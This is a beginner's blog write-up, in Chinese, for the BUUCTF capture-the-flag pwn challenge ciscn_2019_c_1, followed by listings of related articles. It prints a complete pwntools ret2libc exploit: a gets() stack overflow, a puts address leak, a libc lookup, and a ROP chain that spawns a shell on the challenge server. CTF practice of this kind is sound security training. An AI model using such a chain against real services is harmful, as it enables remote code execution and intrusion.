buuctf pwn ciscn_2019_c_1

最新推荐文章于 2024-04-08 00:15:36 发布
最新推荐文章于 2024-04-08 00:15:36 发布
阅读量598 收藏 3
点赞数 4
分类专栏: 笔记 文章标签: ci c语言 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58402603/article/details/120873294
版权

首先基本操作:

先对文件进行checksec和file查看

 然后使用ida进行静态分析,找到main函数后按F5观察伪代码

发现是一个加密程序

 然后按shift+F12进行字符串的查找,发现没有 /bin/sh字符串,因此我们只能利用libcsearch库中的system函数来完成此题,可以对puts函数进行地址泄露。

 对主函数中调用的函数进行查看,可以发现encrypt函数中有gets()函数,可以在这里进行栈溢出攻击

 双击s查看字符串s所分配的内存大小可以发现,一共占50个字节

 编写exe脚本进行攻击

from pwn import*
from LibcSearcher import*
content = 0
context(os='linux',arch='amd64',log_level='debug')

ret = 0x4006b9
elf = ELF('ciscn_2019_c_1')#用ELF格式打开文件
#显示文件信息

puts_plt = elf.plt["puts"]   #  找到get函数的plt和got
puts_got = elf.got['puts']
main_addr = elf.symbols["main"]#main函数起始地址  让它返回到main函数,这样我们才可以再一次利用输入点构造rop

pop_rdi_ret = 0x400c83
#print(puts_plt)
#print(puts_got)
#print(main_addr)
#找到程序内函数在plt表和got表中的地址


p = remote('node4.buuoj.cn',27985) #链接远程
payload = b'\0' + b'a' * (0x50-1 + 8)#serltn()函数读取到\0结束读取字符串,此处用来跳出循环
payload = payload + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendlineafter('Input your choice!\n', '1')
p.sendlineafter('Input your Plaintext to be encrypted\n', payload)

p.recvline()	#接收字符串Ciphertext
p.recvline()    #加密后的密文
puts_addr = u64(p.recv(7)[:-1].ljust(8,b'\x00'))#接收程序返回的地址#lijust(8,‘\0’),不满8位的用0补足    此处的地址为程序泄露出的puts()函数的地址

#print(puts_addr)                               #找出puts的地址140519155866048
#print(payload)

libc = LibcSearcher('puts', puts_addr)#寻找puts函数到对应的libc版本  #利用LibcSearcher模块找到匹配的libc版本 

libc_base   = puts_addr - libc.dump('puts')      #找出程序中函数到libcsearcher函数库的地址偏移量
#因为程序到libcsearcher函数库中的偏移量相同
system_addr = libc_base + libc.dump('system')      #计算出system的在程序中的地址
binsh_addr  = libc_base + libc.dump('str_bin_sh')	#/bin/sh偏移

payload = b'\0' + b'a' * (0x50-1 + 8)
payload = payload + p64(ret) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)

p.sendlineafter('Input your choice!\n', '1')
p.sendlineafter('Input your Plaintext to be encrypted\n', payload)

p.interactive()

运行脚本,此处选择版本1

 

 得到flag

 纯新手,部分内容参考https://blog.csdn.net/weixin_45556441/article/details/115091036

珈乐凯若
关注
专栏目录
BUUCTF - PWNciscn_2019_c_1
古月浪子的博客
03-20 4092
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2629
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1341
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 7262
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
BUUCTF-PWNciscn_2019_c_1
qcwwww的博客
05-07 446
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 checksec一下 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除
BUUCTF-Pwn-ciscn_2019_c_1
餐桌上的猫
02-14 3639
题目截图 检查一下文件信息 开启了NX,64位的文件 使用IDA打开 按shift+F12查看字符串,没有找到“flag”和“/bin/sh”类似的字符串 一番寻找也没有找到system函数 查看函数导入表找到了puts函数和gets函数,说明使用了libc动态库,可以从这里入手 找到gets函数所在位置查看 在函数encrypt中使用了gets函数,存在栈溢出,点击encrypt函数的名称,按x检查交叉引用 双击进入查看调用函数 运行程序可以了解到,该程序的功能是对字符串进行加密和解密,这段代码
日行一PWNciscn_2019_c_1不给出libc题型
m0_57221101的博客
06-02 809
BUUCTF ciscn 依旧使用buu提供的题这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本以及本次的64位程序,在传参上和32位程序的一些不同闲话少叙,后面需要的知识点我们后面再学,我们便分析边聊checksec分析64位的程序,只有数据段免执行保护。地址为0000000000400B28我们可以通过telnet连接一下看看她在干什么可以看到是一个简单的输入判断
BUUCTF ciscn_2019_c_1(ret2libc)
weixin_45441024的博客
01-04 424
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
Buu CTF PWN ciscn_2019_c_1 WriteUp
m0sway的博客
03-03 573
Buu CTF PWNciscn_2019_c_1的WriteUp
BUUCTF ciscn_2019_c_1
红叶的博客
10-30 801
RELRO 是一种用于加强对 Binary 数据段的保护的技术。由 CPU 提供支持,在页表中有Non-executable flag, 来限制一块内存区域不可执行。IDA Pro中查看的大小有时候可能是错误的,大部分时间以gdb动态调试为准。把加密后的文本复制到新建文本文档中,查询RBP的前4个字符。远程调试使用 libc 0 ,本地调试使用 libc 1。64位ELF,开启了部分RELRO以及NX。32位和64位程序在函数调用的方式存在区别。不止这种方法可以获取大小,还有两种方法。84 - 4 即可。
[BUUCTF]ciscn_2019_c_1
最新发布
Lucien_Carr的博客
04-08 1344
想办法通过encrypt函数的 get函数栈溢出获得其中一个函数的地址(本题选择puts),通过LibcSearcher得到该函数在对应libc中的偏移量。没有‘system’,‘bin/sh’等有用的字符串,函数列表里也没有system等后门函数。该程序中并没有system,bin/sh等有用的字符串,无法使用ret2text。也没有构造溢出的函数,但是有很多puts,很好后面ret2libc可以用。通过已经调用过的函数泄露它在程序中的地址,然后利用地址末尾的3个字节,在。没什么能构造溢出的函数。
[buuuctf]ciscn_2019_c_1
逆向萌新的博客
06-16 433
[buuuctf]ciscn_2019_c_1细致教程
[BUUCTF-pwn]——ciscn_2019_c_1
Y_peak的博客
02-07 1241
[BUUCTF-pwn]——ciscn_2019_c_1 题目地址:https://buuoj.cn/challenges#ciscn_2019_c_1 题目: 下载下来checksec一下 再IDA上面看一下,利用shift + f12看下字符串,发现没有我们想要的字符串。以为是ret2shellcode,结果弄了半天不可以。重新看一遍发现开启了NX保护,原来是ret2libc类型的,呜呜呜。 ...
PWN|ciscn_2019_c_1
l2645470582_的博客
02-28 427
1.检查保护机制 (1)开启堆栈保护 (2)64位文件 2.用64位IDA打开该文件 (1)shift+f12查看关键字符串 没有看到后面函数(system等) (2)进入mian函数 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+Ch] [rbp-4h] BYREF init(argc, argv, envp); puts("EEEEEE...
buuctf PWN ciscn_2019_c_1
wp568的博客
10-08 248
amd64的参数调用顺序是如下序列的自后而前,即:完成传递参数(地址)->本函数地址 -> 返回地址。encrypt()里面的get()可以溢出,栈大小为50h。puts()可以用来泄露libc基址。
ciscn_2019_c_1
臭nana的博客
04-14 2971
坑点:ida反编译地址不对 解决办法:通过ROPdadget工具获得正确的pop_rdi和ret的地址 问题:libc版本寻找 解决:通过LibcSearcher工具进行寻找 难点(写这篇文章的目的):这个问题和我前两篇checkin脚本分析最后自己写的一个脚本出现同样的情况,因为题目环境是Ubuntu18,所以需要栈对齐-----地址末尾为0,所以需要加ret 不加ret之前的rsp地址 加了ret后 最后的脚本,python3环境,上述libcsearcher工具要求 ..
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值